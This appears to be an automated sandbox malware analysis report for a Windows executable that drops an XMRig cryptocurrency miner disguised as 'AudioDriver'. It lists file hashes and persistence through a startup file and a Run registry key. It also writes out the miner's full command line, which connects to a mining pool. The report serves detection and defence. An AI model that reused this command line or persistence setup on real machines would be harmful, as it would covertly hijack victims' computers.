Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
17-04-2024 06:29
Behavioral task
behavioral1
Sample
512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe
Resource
win7-20240221-en
General
-
Target
512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe
-
Size
448KB
-
MD5
0d96da9c38b21d97fce1528e7dc1af7c
-
SHA1
1b9b049440b495a9378df502686341734ff167b9
-
SHA256
512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871
-
SHA512
d0511c6dee7001ec9e6f5de471d57870536f9e14a943cbb9ffab4df5252b27625ccad59904a2870767410082d6fb4e804169ebf523e4b1e0334b6ff065c2811a
-
SSDEEP
12288:5i3Q+jkZaZJEeDoS/8+tR7HFVaX4zqhfkH:5i3Q+jkkDoS/8+tNvzAu
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
XMRig Miner payload 1 IoCs
resource yara_rule behavioral1/files/0x000a000000015601-9.dat xmrig -
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioDriver.url 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe -
Executes dropped EXE 1 IoCs
pid Process 3024 AudioDriver.exe -
Loads dropped DLL 1 IoCs
pid Process 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Run\AudioDriver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe" 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe Token: SeLockMemoryPrivilege 3024 AudioDriver.exe Token: SeLockMemoryPrivilege 3024 AudioDriver.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2000 wrote to memory of 3024 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 29 PID 2000 wrote to memory of 3024 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 29 PID 2000 wrote to memory of 3024 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 29 PID 2000 wrote to memory of 3024 2000 512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe"C:\Users\Admin\AppData\Local\Temp\512415531e7f3ef14143d8ebb3c9fd804bb3a33dd907ac676364c6fabdf99871.exe"1⤵
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Users\Admin\AppData\Roaming\Sysfiles\AudioDriver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\AudioDriver.exe" -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x -k -v=0 --donate-level=1 -t 42⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
431KB
MD58278b63510b86f6a6c447c38f449422e
SHA1cf006f6d0ff22afee2814219b39fe9365f0ba05f
SHA2568995af6891f58672f9908a598c1001e04ee3497fbd949b1b23dde195092e42e2
SHA512c9668bd10f98ee4c8a6975b697797da6216bf86e98a46e801e32eb713329a089fb5b160b9f234d958d92227f7eb308bef3053e98145c0d70708d330bcbde88fa